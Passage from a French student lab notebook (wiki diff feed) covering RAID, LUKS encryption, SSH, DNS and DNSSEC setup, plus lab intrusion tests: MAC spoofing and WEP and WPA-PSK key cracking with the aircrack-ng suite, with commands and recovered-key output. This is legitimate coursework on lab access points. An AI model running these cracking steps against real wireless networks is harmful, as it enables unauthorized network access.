md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [====&amp;gt;................]  recovery = 21.8% (229836/1047552) finish=0.4min speed=32833K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [===========&amp;gt;.........]  recovery = 59.6% (626140/1047552) finish=0.2min speed=29816K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/2] [UU_]&lt;br /&gt;
      [==================&amp;gt;..]  recovery = 94.3% (989688/1047552) finish=0.0min speed=30124K/sec&lt;br /&gt;
      &lt;br /&gt;
unused devices: &amp;lt;none&amp;gt;&lt;br /&gt;
root@GreenArrow:~# [  446.720069] md: md0: recovery done.&lt;br /&gt;
cat /proc/mdstat &lt;br /&gt;
Personalities : [raid6] [raid5] [raid4] &lt;br /&gt;
md0 : active raid5 xvdf[3] xvdd[0] xvde[1]&lt;br /&gt;
      2095104 blocks super 1.2 level 5, 512k chunk, algorithm 2 [3/3] [UUU]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cryptage de données ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous vérifions grâce à Gparted que la carte SD fournie comporte une seule partition.&lt;br /&gt;
Une fois ce test passé, nous regardons grâce à dmesg où est localisé la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# dmesg&lt;br /&gt;
[...]&lt;br /&gt;
[1126726.403767] mmcblk1: mmc1:59b4 NCard 14.7 GiB&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notre carte SD se situe donc sur /dev/mmcblk1.&lt;br /&gt;
Nous faisons donc un chiffrage AES avec un hashage SHA256 de la carte SD :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksFormat -c aes -h sha256 /dev/mmcblk1&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous devons alors renseigner un mot de passe pour crypter la clef.&lt;br /&gt;
Ensuite, nous ouvrons la partition Luks, puis nous formatons la carte :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksOpen /dev/sdb1 crypt_sd&lt;br /&gt;
root@zebrasoma:/# mkfs.ext4 /dev/mapper/crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous montons la partition, puis créons un fichier sur la carte :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# mount /dev/mapper/crypt_sd /mnt&lt;br /&gt;
root@zebrasoma:/# vi /mnt/test.txt #on marque un texte dans le fichier&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous démontons la carte SD et fermons la partition Luks :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/# umount /mnt&lt;br /&gt;
root@zebrasoma:/# cryptsetup luksClose crypt_sd&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous essayons ensuite d'accéder à la carte SD. En renseignant le mauvais mot de passe ou en voulant monter la carte sans passer par cryptsetup, une erreur apparait.&lt;br /&gt;
Cependant, une fois le bon mot de passe renseigné, tout re-devient possible.&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation Wifi par WPA2-EAP ====&lt;br /&gt;
&lt;br /&gt;
==== Configuration d'un PCBX ====&lt;/div&gt;</summary>
		<author><name>Ldelecro</name></author>	</entry>

	<entry>
		<id>https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35209</id>
		<title>Cahier 2016 groupe n°2</title>
		<link rel="alternate" type="text/html" href="https://projets-ima.plil.fr/mediawiki/index.php?title=Cahier_2016_groupe_n%C2%B02&amp;diff=35209"/>
				<updated>2016-11-17T10:47:33Z</updated>
		
		<summary type="html">&lt;p&gt;Ldelecro : /* Cassage de mot de passe WPA-PSK par force brute */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Tâche particulière ==&lt;br /&gt;
&lt;br /&gt;
Câblage de la fibre: &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Prise de connaissance du sujet de PRA et le choix des tâches particulières. Nous avons également commencer à essayer d'identifier les câbles de fibres déjà existants.&lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
Toujours sur la tâche particulière. Identification de tous les câbles déjà tirés. Test de link de chaque câble. Nous avons également commencé à passer les câbles restants.&lt;br /&gt;
Tous les câbles nécessaires ont été tirés entre les deux salles, tous les link sont up. Nous avons identifié chaque câble par un scotch de couleur différente. Nous avons également percé la gouttière de la E304 pour laisser passer un raccord de fibre proprement. &lt;br /&gt;
&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Nous avons pu identifier les câbles déjà présents. Il y a donc 2 câbles déjà tirés entre les 2 piles, 2 câbles qui partent de la E306 jusqu'au boîtier ainsi qu'un câble par salle quid descend dans le local technique. &lt;br /&gt;
* Nous allons donc prolonger les 2 câbles s'arrêtant dans le boîtier et tirer 2 nouveaux câbles entre les deux piles: nous aurons donc 6 fils au total. &lt;br /&gt;
* 2 Grands câbles de 30m ~ -&amp;gt; Estimation de 26m entre les 2 piles.&lt;br /&gt;
* 2 petits câbles de 15m ~ -&amp;gt; Estimation de 13m du boîtier à la pile&lt;br /&gt;
* Retirer le câble ethernet qui était tiré entre les 2 piles.&lt;br /&gt;
* 7 heures passées au total sur la tâche particulière&lt;br /&gt;
[[Fichier:im1.JPG|300px|thumb|left|Fibre passant entre les 2 salles]]&lt;br /&gt;
[[Fichier:im2.JPG|300px|thumb|right|Câbles dans le faux plafond]]&lt;br /&gt;
[[Fichier:im4.JPG|300px|thumb|left|Guide câbles pour le faux plafond]]&lt;br /&gt;
[[Fichier:im5.JPG|300px|thumb|right|Boîtiers contenant les raccords de fibres]]&lt;br /&gt;
[[Fichier:im6.JPG|300px|thumb|left|Les fibres en E304 disponibles]]&lt;br /&gt;
[[Fichier:im7.JPG|300px|thumb|right|Trou dans le cache laissant passer la fibre]] &amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Travail commun ==&lt;br /&gt;
&lt;br /&gt;
* Installation de la machine virtuelle XEN&lt;br /&gt;
* Achat du nom de domaine [http://jjlddelamuerto.space] sur Gandi pour 1.19€ TTC&lt;br /&gt;
&lt;br /&gt;
=== Services Internet ===&lt;br /&gt;
&lt;br /&gt;
==== Serveur SSH ====&lt;br /&gt;
&lt;br /&gt;
Sur notre machine virtuelle nous avons configuré le fichier sshd_config (changement de la ligne PubkeyAuthentication) :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:~# vim /etc/ssh/sshd_config&lt;br /&gt;
&lt;br /&gt;
RSAAuthentication yes&lt;br /&gt;
PubkeyAuthentication yes&lt;br /&gt;
#AuthorizedKeysFile     %h/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:~# service ssh restart&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons ensuite réussi à nous connecter en SSH sur notre VM:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
jjoignau@weppes:~$ ssh root@193.48.57.162&lt;br /&gt;
root@193.48.57.162's password: &lt;br /&gt;
&lt;br /&gt;
The programs included with the Debian GNU/Linux system are free software;&lt;br /&gt;
the exact distribution terms for each program are described in the&lt;br /&gt;
individual files in /usr/share/doc/*/copyright.&lt;br /&gt;
&lt;br /&gt;
Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent&lt;br /&gt;
permitted by applicable law.&lt;br /&gt;
Last login: Mon Nov  7 10:06:49 2016&lt;br /&gt;
root@GreenArrow:~# exit&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Serveur DNS ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord, nous modifions le fichier '''named.conf.local''' pour créer les zones nécessaires :&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/bind/named.conf.local&lt;br /&gt;
zone &amp;quot;jjlddelamuerto.space&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.jjlddelamuerto.space&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&lt;br /&gt;
zone &amp;quot;57.48.193.in-addr.arpa&amp;quot; IN {&lt;br /&gt;
             type master;&lt;br /&gt;
             file &amp;quot;/etc/bind/db.57.48.193.in-addr.arpa&amp;quot;;&lt;br /&gt;
        };&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous créons ensuite les fichiers '''db.jjlddelamuerto.space''' et '''db.57.48.193.in-addr.arpa''' :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     ns.jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                       2016113007       ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
@       IN      NS      ns.jjlddelamuerto.space. &lt;br /&gt;
@       IN      NS      ns6.gandi.net.&lt;br /&gt;
ns      IN      A       193.48.57.162&lt;br /&gt;
www     IN      A       193.48.57.162&lt;br /&gt;
@       IN      A       193.48.57.162&lt;br /&gt;
ns      IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
www     IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
@       IN      AAAA       2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
$TTL    604800&lt;br /&gt;
@       IN      SOA     jjlddelamuerto.space. root.jjlddelamuerto.space. (&lt;br /&gt;
                        2016113007      ; Serial&lt;br /&gt;
                         604800         ; Refresh&lt;br /&gt;
                          86400         ; Retry&lt;br /&gt;
                        2419200         ; Expire&lt;br /&gt;
                         604800 )       ; Negative Cache TTL&lt;br /&gt;
;&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns.jjlddelamuerto.space.&lt;br /&gt;
57.48.193.in-addr.arpa.         IN      NS      ns2.gandi.net.&lt;br /&gt;
&lt;br /&gt;
162                             IN      PTR     jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous modifions ensuite le fichier /etc/resolv.conf afin de passer par notre serveur :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# vim /etc/resolv.conf&lt;br /&gt;
search jjlddelamuerto.space&lt;br /&gt;
nameserver 193.48.57.162&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous vérifions notre configuration :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind# host www.jjlddelamuerto.space&lt;br /&gt;
www.jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
www.jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
&lt;br /&gt;
root@GreenArrow:/etc/bind# host -tany jjlddelamuerto.space&lt;br /&gt;
jjlddelamuerto.space has IPv6 address 2001:660:4401:60ba:216:3eff:fe80:efa8&lt;br /&gt;
jjlddelamuerto.space has address 193.48.57.162&lt;br /&gt;
jjlddelamuerto.space has SOA record ns.jjlddelamuerto.space. root.jjlddelamuerto.space. 2016113007 604800 86400 2419200 604800&lt;br /&gt;
jjlddelamuerto.space name server ns6.gandi.net.&lt;br /&gt;
jjlddelamuerto.space name server ns.jjlddelamuerto.space.&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de site web par certificat ====&lt;br /&gt;
&lt;br /&gt;
==== Sécurisation de serveur DNS par DNSSEC ====&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 2048 -r /dev/urandom -f KSK -n ZONE jjlddelamuerto.space&lt;br /&gt;
   dnssec-keygen -a RSASHA1 -b 1024 -r /dev/urandom -n ZONE jjlddelamuerto.space&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@GreenArrow:/etc/bind/jjlddelamuerto.space.dnssec# ls&lt;br /&gt;
Kjjlddelamuerto.space-ksk.key	   Kjjlddelamuerto.space-zsk.key&lt;br /&gt;
Kjjlddelamuerto.space-ksk.private  Kjjlddelamuerto.space-zsk.private&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Tests d'intrusion ===&lt;br /&gt;
&lt;br /&gt;
==== Intrusion par changement d'adresse MAC ====&lt;br /&gt;
&lt;br /&gt;
Tout d'abord nous modifions le fichier /etc/network/interfaces:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# vim /etc/network/interfaces&lt;br /&gt;
auto wlan5&lt;br /&gt;
iface wlan5 inet static&lt;br /&gt;
        address 172.26.79.21&lt;br /&gt;
        netmask 255.255.240.0&lt;br /&gt;
        gateway 172.26.79.254&lt;br /&gt;
        wireless mode-managed&lt;br /&gt;
        wireless-essid Wolverine&lt;br /&gt;
        wireless-key 0123456789&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous vérifions ensuite que nous sommes associés à Wolverine:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig&lt;br /&gt;
wlan5     IEEE 802.11abg  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Frequency:2.462 GHz  Access Point: 44:AD:D9:5F:87:00   &lt;br /&gt;
          Bit Rate=54 Mb/s   Tx-Power=200 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
          Link Quality=50/70  Signal level=-60 dBm  &lt;br /&gt;
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0&lt;br /&gt;
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous changeons ensuite l'@ MAC:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip link set wlan5 address 00:1a:56:a4:4b:ff&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ip a&lt;br /&gt;
3: wlan5: &amp;lt;NO-CARRIER,BROADCAST,MULTICAST,UP&amp;gt; mtu 1500 qdisc mq state DOWN group default qlen 1000&lt;br /&gt;
    link/ether 00:1a:56:a4:4b:ff brd ff:ff:ff:ff:ff:ff&lt;br /&gt;
    inet 172.26.79.21/20 brd 172.26.79.255 scope global wlan5&lt;br /&gt;
       valid_lft forever preferred_lft forever&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Après le changement d'@ MAC, l'association est bien impossible:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# ifconfig wlan5 up&lt;br /&gt;
root@zebrasoma:/home/pifou# iwconfig        &lt;br /&gt;
wlan5     IEEE 802.11bgn  ESSID:&amp;quot;Wolverine&amp;quot;  &lt;br /&gt;
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   &lt;br /&gt;
          Retry short limit:7   RTS thr:off   Fragment thr:off&lt;br /&gt;
          Encryption key:0123-4567-89&lt;br /&gt;
          Power Management:off&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Crackage de la clef WEP ====&lt;br /&gt;
&lt;br /&gt;
Nous avons fait le crack de la clé WEP sur cracotte08.&lt;br /&gt;
Pour cracker la clef WEP, nous avons tout d'abord utiliser airmon-ng afin de voir le statut des interfaces réseau.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On entre ensuite en mode monitoring sur l'interface wlan5 :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airmon-ng start wlan5&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Found 2 processes that could cause trouble.&lt;br /&gt;
If airodump-ng, aireplay-ng or airtun-ng stops working after&lt;br /&gt;
a short period of time, you may want to kill (some of) them!&lt;br /&gt;
&lt;br /&gt;
PID	Name&lt;br /&gt;
1986	avahi-daemon&lt;br /&gt;
1987	avahi-daemon&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Interface	Chipset		Driver&lt;br /&gt;
&lt;br /&gt;
mon0		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
wlan0		Broadcom	wl - [phy0]&lt;br /&gt;
wlan5		Ralink RT2870/3070	rt2800usb - [phy1]&lt;br /&gt;
				(monitor mode enabled on mon1)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Pour continuer, nous capturons les paquets transitant afin de collecter les paquets nécessaires au décryptage de la clef WEP. L'option --encrypt wep permet de filtrer uniquement les points d'accès WEP.&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wep wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  5 ][ Elapsed: 0 s ][ 2016-03-31 18:36                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 44:AD:D9:5F:87:00  -42        3        0    0   3  54e. WEP  WEP         Wolverine                    &lt;br /&gt;
 04:DA:D2:9C:50:50  -59        2       11    0   2  54e. WEP  WEP         cracotte01                   &lt;br /&gt;
 04:DA:D2:9C:50:56  -59        3       19    0   2  54e. WEP  WEP         cracotte07                   &lt;br /&gt;
 04:DA:D2:9C:50:59  -59        2        0    0   2  54e. WEP  WEP         cracotte10                   &lt;br /&gt;
 04:DA:D2:9C:50:57  -59        2       15    0   2  54e. WEP  WEP         cracotte08                   &lt;br /&gt;
 04:DA:D2:9C:50:52  -58        3       85   42   2  54e. WEP  WEP         cracotte03                   &lt;br /&gt;
 04:DA:D2:9C:50:54  -58        1       20    9   2  54e. WEP  WEP         cracotte05                    &lt;br /&gt;
 04:DA:D2:9C:50:55  -60        1        9    4   2  54e. WEP  WEP         cracotte06                    &lt;br /&gt;
 04:DA:D2:9C:50:51  -59        2      134   66   2  54e. WEP  WEP         cracotte02                   &lt;br /&gt;
 04:DA:D2:9C:50:53  -61        6       95   47   2  54e. WEP  WEP         cracotte04                   &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                              &lt;br /&gt;
                                                                                                        &lt;br /&gt;
 04:DA:D2:9C:50:50  00:0F:B5:92:23:75  -66   54e-48e    68       10                                     &lt;br /&gt;
 04:DA:D2:9C:50:56  00:0F:B5:92:23:71  -72   36e- 2e   133       19                                     &lt;br /&gt;
 04:DA:D2:9C:50:57  00:0F:B5:92:22:66  -66   54e-36e    89       15                                     &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -62   54e-48e    23       84                                     &lt;br /&gt;
 04:DA:D2:9C:50:54  00:0F:B5:92:23:74  -66   54e-36e   576       20                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Nous avons choisi de récuperer la clef WEP de cracotte03 (son BSSID est lié à une station)&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 2 -w crackWEP wlan5&lt;br /&gt;
&lt;br /&gt;
 CH  2 ][ Elapsed: 12 s ][ 2016-03-31 18:42                                         &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID&lt;br /&gt;
                                                                                                       &lt;br /&gt;
 04:DA:D2:9C:50:52  -57  35       43     1066   87   2  54e. WEP  WEP         cracotte03               &lt;br /&gt;
                                                                                                       &lt;br /&gt;
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                             &lt;br /&gt;
                                                                                                                                   &lt;br /&gt;
 04:DA:D2:9C:50:52  00:0F:B5:92:23:6A  -64   36e-48e  1232     1067                                     &lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Enfin, nous lançons le crack de la clef à l'aide de aircrack-ng :&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng crackWEP-02.cap&lt;br /&gt;
                           Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:00:04] Tested 112801 keys (got 3050 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    6/ 10   CD(5120) 15(4864) 6D(4864) 8C(4864) A7(4864) &lt;br /&gt;
    1   46/  1   E9(4352) 04(4096) 0E(4096) 0F(4096) 16(4096) &lt;br /&gt;
    2   14/ 42   C8(4864) 10(4608) 11(4608) 1D(4608) 58(4608) &lt;br /&gt;
    3   19/  3   CF(4864) 0A(4608) 5E(4608) 8E(4608) 90(4608) &lt;br /&gt;
    4    2/ 16   08(5632) 89(5376) 96(5376) B4(5376) F7(5376) &lt;br /&gt;
&lt;br /&gt;
Failed. Next try with 5000 IVs.&lt;br /&gt;
&amp;lt;/pre&amp;gt; &lt;br /&gt;
&lt;br /&gt;
Il est nécessaire d'être proche du point d’accès (sinon le débit est trop faible, ce qui rend l'opération longue), ainsi que de capturer un minimum de 10 000 paquets.&lt;br /&gt;
&lt;br /&gt;
Au final, nous arrivons bien à récupérer la clef WEP : &lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
                               Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                 [00:04:10] Tested 799 keys (got 42913 IVs)&lt;br /&gt;
&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/  1   EE(56320) B4(51712) 9D(50944) 4E(50688) 28(50432) &lt;br /&gt;
    1    1/  2   D9(55552) 3D(50176) 68(49664) 08(49408) 49(49152) &lt;br /&gt;
    2    1/  5   A2(53504) 5B(52480) 93(52480) 73(52224) 10(50432) &lt;br /&gt;
    3    1/  3   30(53248) 81(51456) 5B(49920) 6E(49920) 1E(49664) &lt;br /&gt;
    4    9/  4   9D(50176) 31(49408) 18(49152) 72(49152) E1(49152) &lt;br /&gt;
&lt;br /&gt;
             KEY FOUND! [ EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:EE:E4:44 ] &lt;br /&gt;
	Decrypted correctly: 100%&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== Cassage de mot de passe WPA-PSK par force brute ====&lt;br /&gt;
Nous refaisons les mêmes actions que pour le crackage de clef WEP.&lt;br /&gt;
Cette fois nous essayons de cracker la clef WPA sur cracotte03.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --encrypt wpa wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# airodump-ng --essid cracotte03 --channel 13 -w crackWPA wlan5&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Une fois le handshake récupéré:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
root@zebrasoma:/home/pifou# aircrack-ng -w dico.txt crackWPA-01.cap&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
Nous avons lancé ceci sur le eeePC qui a une vitesse de traitement 5 fois inférieure à celle d'une zabeth environ (environ 5h de traitement). Puis nous obtenons le résultat suivant:&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
                                   Aircrack-ng 1.2 beta3&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                   [04:32:42] 12399908 keys tested (759.63 k/s)&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
                           KEY FOUND! [ 12399903 ]&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
      Master Key     : 33 2B 69 DD 95 0A 5A E0 01 22 7E FF 98 DA 99 87 &lt;br /&gt;
                       40 7A CB CC 8A E5 32 9F FE 4E 5C 44 91 38 13 93 &lt;br /&gt;
&lt;br /&gt;
      Transient Key  : 70 EE 27 96 5B 34 B5 4F 06 A1 F2 B6 A7 16 1E 21 &lt;br /&gt;
                       7A 0B BD F4 13 67 5B 4C ED 30 A9 0D 91 E3 F9 7F &lt;br /&gt;
                       88 E6 12 68 9C 77 4B 48 EB 5E 6A 5A DD 1D D9 08 &lt;br /&gt;
